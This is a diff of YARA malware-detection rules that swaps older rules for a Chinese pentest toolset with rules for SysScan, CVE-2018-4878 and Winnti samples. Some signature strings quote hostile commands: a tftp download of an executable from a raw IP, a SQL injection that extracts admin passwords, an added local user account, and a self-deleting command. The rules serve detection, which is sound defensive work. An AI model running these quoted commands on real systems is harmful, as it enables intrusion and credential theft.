+		logic_hash = "df0834e89c512721547001c910c1461f028a46e954dd51017d4e8bde7893d04a"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CRIMEWARE, FILE"
+		maltype = "crimeware"
+		type = "crimeware"
+		filetype = "Win32 EXE"
+		version = "1.0"
+		hash1 = "fac495be1c71012682ebb27092060b43"
+		hash2 = "e8cc69231e209db7968397e8a244d104"
+		hash3 = "a53847a51561a7e76fd034043b9aa36d"
+		hash4 = "e8691fa5872c528cd8e72b82e7880e98"
+		hash5 = "F661b50d45400e7052a2427919e2f777"
 
 	strings:
-		$s0 = "User-agent:\\s{0,32}(huasai|huasai/1.0|\\*)" fullword ascii
-		$s1 = "scan web.exe" fullword wide
+		$a1 = "/c ping -n 2 127.0.0.1 & del \"SysScan.exe\"" ascii wide
+		$a2 = "SysScan DEBUG Mode!!!" ascii wide
+		$a3 = "This rechecking? (set 0/1 or press enter key)" ascii wide
+		$a4 = "http://37.49.224.144:8189/manual_result" ascii wide
+		$b1 = "Checker end work!" ascii wide
+		$b2 = "Trying send result..." ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3680KB and all of them
+		uint16( 0 ) == 0x5A4D and filesize < 5000000 and ( any of ( $a* ) or all of ( $b* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Mempodipper2_6 : FILE
+rule SIGNATURE_BASE_Xdedic_Packed_Syscan : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file mempodipper2.6.39"
-		author = "Florian Roth (Nextron Systems)"
-		id = "43a27968-adab-5f27-9b8c-8f0f895f0576"
-		date = "2015-06-23"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Kaspersky Lab - modified by Florian Roth"
+		id = "da8e59f3-53f9-504b-afff-9caab798db6c"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L189-L203"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sysscan.yar#L29-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ba2c79911fe48660898039591e1742b3f1a9e923"
-		logic_hash = "1a2c42757199818b94a73b9faff3380911655992ef3214a33a220eac15850c4b"
-		score = 70
-		quality = 85
+		logic_hash = "04eb5b056e892b2c2cf87e3770847226cccaceb1c743f3b9f8ac548026747ccf"
+		score = 75
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		company = "Kaspersky Lab"
 
 	strings:
-		$s0 = "objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed" ascii
+		$a1 = "SysScan.exe" nocase ascii wide
+		$a2 = "1.3.4." wide
 
 	condition:
-		filesize < 30KB and all of them
+		uint16( 0 ) == 0x5A4D and filesize > 500KB and filesize < 1500KB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_COOKIE_Cookie : FILE
+rule SIGNATURE_BASE_Crime_Ole_Loadswf_Cve_2018_4878 : PURPORTED_NORTH_KOREAN_ACTORS CVE_2018_4878 FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file CooKie.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5f85bb0f-6df2-512c-ba1a-8a74c1a55563"
-		date = "2015-06-23"
+		description = "Detects CVE-2018-4878"
+		author = "Vitali Kremez, Flashpoint"
+		id = "44797bbc-693b-5fcb-a4a4-4ebf3f4da725"
+		date = "2025-01-01"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L205-L220"
+		reference = "hxxps://www[.]krcert[.]or[.kr/data/secNoticeView.do?bulletin_writing_sequence=26998"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ole_loadswf_cve_2018_4878.yar#L2-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f7727160257e0e716e9f0cf9cdf9a87caa986cde"
-		logic_hash = "6d942e53a253cb157e535f86ca457c93a6039b2c5ebb3969dc3e271242b478d4"
-		score = 70
+		logic_hash = "716cad0c5a12cc360522e2649c7870a493bef4bec3d55c3a3e235f3a85c02a56"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "PURPORTED NORTH KOREAN ACTORS, CVE-2018-4878, FILE"
+		vuln_type = "Remote Code Execution"
+		vuln_impact = "Use-after-free"
+		affected_versions = "Adobe Flash 28.0.0.137 and earlier versions"
+		mitigation0 = "Implement Protected View for Office documents"
+		mitigation1 = "Disable Adobe Flash"
+		weaponization = "Embedded in Microsoft Office first payloads"
+		actor = "Purported North Korean actors"
 
 	strings:
-		$s4 = "-1 union select 1,username,password,4,5,6,7,8,9,10 from admin" fullword ascii
-		$s5 = "CooKie.exe" fullword wide
+		$header = "rdf:RDF" wide ascii
+		$title = "Adobe Flex" wide ascii
+		$pdb = "F:\\work\\flash\\obfuscation\\loadswf\\src" wide ascii
+		$s0 = "URLRequest" wide ascii
+		$s1 = "URLLoader" wide ascii
+		$s2 = "loadswf" wide ascii
+		$s3 = "myUrlReqest" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 360KB and all of them
+		filesize < 500KB and all of ( $header* ) and all of ( $title* ) and 3 of ( $s* ) or all of ( $pdb* ) and all of ( $header* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Honker_Wwwscan_1_Wwwscan : FILE
+rule SIGNATURE_BASE_Winnti_Signing_Cert : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
+		description = "Detects a signing certificate used by the Winnti APT group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b6a94a3-6f9c-59b2-931b-c06701b95d59"
-		date = "2015-06-23"
+		id = "0cf185eb-fb8d-5e1f-9089-4f36eb4798de"
+		date = "2015-10-10"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L222-L237"
+		reference = "https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L9-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6bed45629c5e54986f2d27cbfc53464108911026"
-		logic_hash = "7b0b6bbcba49c8f950ea3cf5a364059ba784c87a41eba6d825a9ca4e3a07bfbc"
-		score = 70
+		logic_hash = "6fd5f2808e7d683b9c4b7f5d4ccfd0eb87037eb2e70700b2c083db8c6ddf4a26"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a9a8dc4ae77b1282f0c8bdebd2643458fc1ceb3145db4e30120dd81676ff9b61"
+		hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
 
 	strings:
-		$s0 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
-		$s3 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
+		$s1 = "Guangzhou YuanLuo Technology Co." ascii
+		$s2 = "Guangzhou YuanLuo Technology Co.,Ltd" ascii
+		$s3 = "$Asahi Kasei Microdevices Corporation0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_D_Injection_V2_32 : FILE
+rule SIGNATURE_BASE_Winnti_Malware_Nsiproxy : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
+		description = "Detects a Winnti rootkit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b"
-		date = "2015-06-23"
+		id = "9b14541c-6077-5f3b-8f73-ff3d283bf209"
+		date = "2015-10-10"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L239-L254"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L28-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3a000b976c79585f62f40f7999ef9bdd326a9513"
-		logic_hash = "0107903a481b09faa92a5fbb162fd981f976ed864be3a0840b43063461e20974"
-		score = 70
+		logic_hash = "742b091cc630ecea995be8d022eabadef1725dbd952f66a9ca62ecdee6985733"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
+		hash2 = "cf1e006694b33f27d7c748bab35d0b0031a22d193622d47409b6725b395bffb0"
+		hash3 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
+		hash4 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
+		hash5 = "ba7ccd027fd2c826bbe8f2145d5131eff906150bd98fe25a10fbee2c984df1b8"
 
 	strings:
-		$s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide
-		$s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
+		$x1 = "\\Driver\\nsiproxy" wide
+		$a1 = "\\Device\\StreamPortal" wide
+		$a2 = "\\Device\\PNTFILTER" wide
+		$s1 = "Cookie: SN=" fullword ascii
+		$s2 = "\\BaseNamedObjects\\_transmition_synchronization_" wide
+		$s3 = "Winqual.sys" fullword wide
+		$s4 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" wide
+		$s5 = "http://www.wasabii.com.tw 0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+		uint16( 0 ) == 0x5a4d and $x1 and 1 of ( $a* ) and 2 of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Honker_Net_Priv_Esc2 : FILE
+rule SIGNATURE_BASE_Winnti_Malware_Updatedll : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file net-priv-esc2.exe"
+		description = "Detects a Winnti malware - Update.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b4fa3129-57a3-55ee-8ca6-ecbcc135184e"
-		date = "2015-06-23"
+		id = "c6896191-d856-55f2-a47f-621a4f10d0c7"
+		date = "2015-10-10"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L256-L271"
+		reference = "VTI research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L56-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4851e0088ad38ac5b3b1c75302a73698437f7f17"
-		logic_hash = "53cf3d984bc82428eb0a6ee416bcd5429718a1d615ce1c1ba399cda42268d26c"
-		score = 70
+		logic_hash = "4b483e77106cc0e2f8ed2398de8b34b8246472875ad3e0612fa06cac96b7e6aa"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
+		hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
+		hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
+		hash4 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
 
 	strings:
-		$s1 = "Usage:%s username password" fullword ascii
-		$s2 = "<www.darkst.com>" fullword ascii
+		$c1 = "'Wymajtec$Tima Stempijg Sarviges GA -$G2" fullword ascii
+		$c2 = "AHDNEAFE1.sys" fullword ascii
+		$c3 = "SOTEFEHJ3.sys" fullword ascii
+		$c4 = "MainSYS64.sys" fullword ascii
+		$s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" wide
+		$s2 = "Update.dll" fullword ascii
+		$s3 = "\\\\.\\pipe\\usbpcex%d" fullword wide
+		$s4 = "\\\\.\\pipe\\usbpcg%d" fullword wide
+		$s5 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" wide
+		$s6 = "\\??\\pipe\\usbpcg%d" fullword wide
+		$s7 = "\\??\\pipe\\usbpcex%d" fullword wide
+		$s8 = "HOST: %s" fullword ascii
+		$s9 = "$$$--Hello" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 17KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 1 of ( $c* ) and 3 of ( $s* ) ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Oracle_V1_0_Oracle : FILE
+rule SIGNATURE_BASE_Winnti_Malware_FWPK : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Oracle.exe"
+		description = "Detects a Winnti malware - FWPKCLNT.SYS"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0cebede9-f4ff-5efb-98bc-55df0ad656a3"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L273-L289"
+		id = "591ad72d-b9d4-5cd9-9103-37e001026610"
+		date = "2015-10-10"
+		modified = "2023-01-06"
+		reference = "VTI research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L90-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0264f4efdba09eaf1e681220ba96de8498ab3580"
-		logic_hash = "6f1bb6b14445a9ca29768ab2dcf831a98cb5d153d03ebc4bc497bb8f8144a365"
-		score = 70
+		logic_hash = "6e87b06f6bf11dceb04c8eb4910f5d98ec3fe430fa984eeed8b73e99b28c5abe"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1098518786c84b0d31f215122275582bdcd1666653ebc25d50a142b4f5dabf2c"
+		hash2 = "9a684ffad0e1c6a22db1bef2399f839d8eff53d7024fb014b9a5f714d11febd7"
+		hash3 = "a836397817071c35e24e94b2be3c2fa4ffa2eb1675d3db3b4456122ff4a71368"
 
 	strings:
-		$s1 = "!http://localhost/index.asp?id=zhr" fullword ascii
-		$s2 = "OnGetPassword" fullword ascii
-		$s3 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
+		$s0 = "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\" wide
+		$s1 = "%x:%d->%x:%d, Flag %s%s%s%s%s, seq %u, ackseq %u, datalen %u" fullword ascii
+		$s2 = "FWPKCLNT.SYS" fullword ascii
+		$s3 = "Port Layer" fullword wide
+		$s4 = "%x->%x, icmp type %d, code %d" fullword ascii
+		$s5 = "\\BaseNamedObjects\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28E}" wide
+		$s6 = "\\Ndi\\Interfaces" wide
+		$s7 = "\\Device\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28F}" wide
+		$s8 = "Bad packet" fullword ascii
+		$s9 = "\\BaseNamedObjects\\EKV0000000000" wide
+		$s10 = "%x->%x" fullword ascii
+		$s11 = "IPInjectPkt" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3455KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 642KB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Interception : FILE
+rule SIGNATURE_BASE_Winnti_Malware_Streamportal_Gen : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Interception.exe"
+		description = "Detects a Winnti malware - Streamportal"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40d350e5-c6af-58e2-a1d8-f9516af5f869"
-		date = "2015-06-23"
+		id = "f9d31d6b-a6f7-5359-b741-960b678e0b9c"
+		date = "2015-10-10"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L291-L306"
+		reference = "VTI research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L119-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ea813aed322e210ea6ae42b73b1250408bf40e7a"
-		logic_hash = "d1ae5f8ff21659b95f6e62b1d5e3ec15b122a2b5889e8984f3d9f6d2fa938d17"
-		score = 70
+		logic_hash = "249f51b263fbcab650983d75482fd4787934731e415fcbd0e6f6925032aac690"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
+		hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
+		hash3 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
 
 	strings:
-		$s2 = ".\\dat\\Hookmsgina.dll" fullword ascii
-		$s5 = "WinlogonHackEx " fullword wide
+		$s0 = "Proxies destination address/port for TCP" fullword wide
+		$s3 = "\\Device\\StreamPortal" wide
+		$s4 = "Transport-Data Proxy Sub-Layer" fullword wide
+		$s5 = "Cookie: SN=" fullword ascii
+		$s6 = "\\BaseNamedObjects\\_transmition_synchronization_" wide
+		$s17 = "NTOSKRNL.EXE" fullword wide
+		$s19 = "FwpsReferenceNetBufferList0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 160KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 275KB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_Dubrute_V3_0_RC3_3_0 : FILE
+
+rule SIGNATURE_BASE_WINNTI_Kingsoft_Moz_Confustion : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file 3.0.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "994ad7e9-2019-54b3-84e6-2762a700c939"
-		date = "2015-06-23"
+		description = "Detects Barium sample with Copyright confusion"
+		author = "Markus Neis"
+		id = "0c45c1ff-6734-504f-91d1-cf5d6744252f"
+		date = "2018-04-13"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L308-L324"
+		reference = "https://www.virustotal.com/en/file/070ee4a40852b26ec0cfd79e32176287a6b9d2b15e377281d8414550a83f6496/analysis/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L143-L159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "49b311add0940cf183e3c7f3a41ea6e516bf8992"
-		logic_hash = "6d2f6721c942332af1be0b6537e9b9d0b5b3e91eb3912dcd095aa18bccfc4ad5"
-		score = 70
+		logic_hash = "ebd8465f484e1142ac741263282ea1c6f98e6bd0637ebdcec6ecc6233193407e"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "explorer.exe http://bbs.yesmybi.net" fullword ascii
-		$s1 = "LOADER ERROR" fullword ascii
-		$s9 = "CryptGenRandom" fullword ascii
+		hash1 = "070ee4a40852b26ec0cfd79e32176287a6b9d2b15e377281d8414550a83f6496"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 395KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "7f01b23ccfd1017249c36bc1618d6892" or ( pe.version_info [ "LegalCopyright" ] contains "Mozilla Corporation" and pe.version_info [ "ProductName" ] contains "Kingsoft" ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Windows_Exp : FILE
+rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file exp.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "148900d0-cf62-5cb0-adbc-52fa8ce8832e"
-		date = "2015-06-23"
+		description = "Detects Winnti malware"
+		author = "Unknown"
+		id = "322e9362-bfb6-55e3-9a93-d54246311d11"
+		date = "2019-12-06"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L326-L341"
+		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L160-L176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "04334c396b165db6e18e9b76094991d681e6c993"
-		logic_hash = "6a146545fd12e7603bf1e2ccb9b2d308b13fe2acdb9248a79c80b6c1de37fd73"
-		score = 70
+		logic_hash = "9e26a642cfe143b8efc52b2b9789c2ec54592f6347f16fb8716912767e4f9879"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "c:\\windows\\system32\\command.com /c " fullword ascii
-		$s8 = "OH,Sry.Too long command." fullword ascii
+		$e1 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411015}" ascii nocase
+		$e2 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411014}" ascii nocase
+		$e3 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411016}" ascii nocase
+		$e4 = "\\BaseNamedObjects\\{B2B87CCA-66BC-4C24-89B2-C23C9EAC2A66}" wide
+		$e5 = "BFE_Notify_Event_{7D00FA3C-FBDC-4A8D-AEEB-3F55A4890D2A}" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( any of ( $e* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Safe3Wvs_Cgiscan : FILE
+rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file cgiscan.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a9f7a195-deb8-5887-bc55-d1b0cac43182"
-		date = "2015-06-23"
+		description = "Detects Winnti malware"
+		author = "Unknown"
+		id = "77f2cb7d-90a6-5654-9d2e-6b525cd910a2"
+		date = "2019-12-06"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L343-L358"
+		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L178-L201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f94bbf2034ad9afa43cca3e3a20f142e0bb54d75"
-		logic_hash = "990dcede3bb83216af7e72e2a49bc2355ebd45ebd3fc658ba337a285dcdf799f"
-		score = 70
+		logic_hash = "216557999b7100f26556f9f7088b16ba125ac39b308cb77c997d620ce9591d24"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s2 = "httpclient.exe" fullword wide
-		$s3 = "www.safe3.com.cn" fullword wide
+		$a1 = "IPSecMiniPort" wide fullword
+		$a2 = "ndis6fw" wide fullword
+		$a3 = "TCPIP" wide fullword
+		$a4 = "NDIS.SYS" ascii fullword
+		$a5 = "ntoskrnl.exe" ascii fullword
+		$a6 = "\\BaseNamedObjects\\{B2B87CCA-66BC-4C24-89B2-C23C9EAC2A66}" wide
+		$a7 = "\\Device\\Null" wide
+		$a8 = "\\Device" wide
+		$a9 = "\\Driver" wide
+		$b1 = { 66 81 7? ?? 70 17 }
+		$b2 = { 81 7? ?? 07 E0 15 00 }
+		$b3 = { 8B 46 18 3D 03 60 15 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 357KB and all of them
+		(6 of ( $a* ) ) and ( 2 of ( $b* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Pr_Debug : FILE
+rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_3
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file debug.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6d759818-b762-56f4-8475-82a7d18a659c"
-		date = "2015-06-23"
+		description = "Detects Winnti malware"
+		author = "Unknown"
+		id = "2e001c91-0794-5940-ad8c-8e58a01e100c"
+		date = "2019-12-06"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L360-L375"
+		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L203-L219"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
-		logic_hash = "0b7508e3a508adc9416f16549290e06468520c156dbd5192e5a352820586af9f"
-		score = 70
+		logic_hash = "d09f948c9bf685de64e8a6f1c95d95b806651866f3364d5d9b8b2351c1a68be3"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "-->Got WMI process Pid: %d " ascii
-		$s2 = "This exploit will execute \"net user temp 123456 /add & net localg" ascii
+		$b1 = { 0F B7 ?? 16 [0-1] (81 E? | 25) 00 20 [0-2] [8] 8B ?? 50 41 B9 40 00 00 00 41 B8 00 10 00 00 }
+		$b2 = { 8B 40 28 [5-8] 48 03 C8 48 8B C1 [5-8] 48 89 41 28 }
+		$b3 = { 48 6B ?? 28 [5-8] 8B ?? ?? 10 [5-8] 48 6B ?? 28 [5-8] 8B ?? ?? 14 }
+		$b4 = { 83 B? 90 00 00 00 00 0F 84 [9-12] 83 B? 94 00 00 00 00 0F 84 }
+		$b5 = { (45 | 4D) (31 | 33) C0 BA 01 00 00 00 [10-16] FF 5? 28 [0-1] (84 | 85) C0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 820KB and all of them
+		(4 of ( $b* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V4_0 : FILE
+rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_4
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v4.0.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d41cbed5-a6e3-5165-a8c3-e0375c1ed75d"
-		date = "2015-06-23"
+		description = "Detects Winnti malware"
+		author = "Unknown"
+		id = "1f7ac215-d049-5b97-9797-9589a70cbf2b"
+		date = "2019-12-06"
 		modified = "2023-12-05"
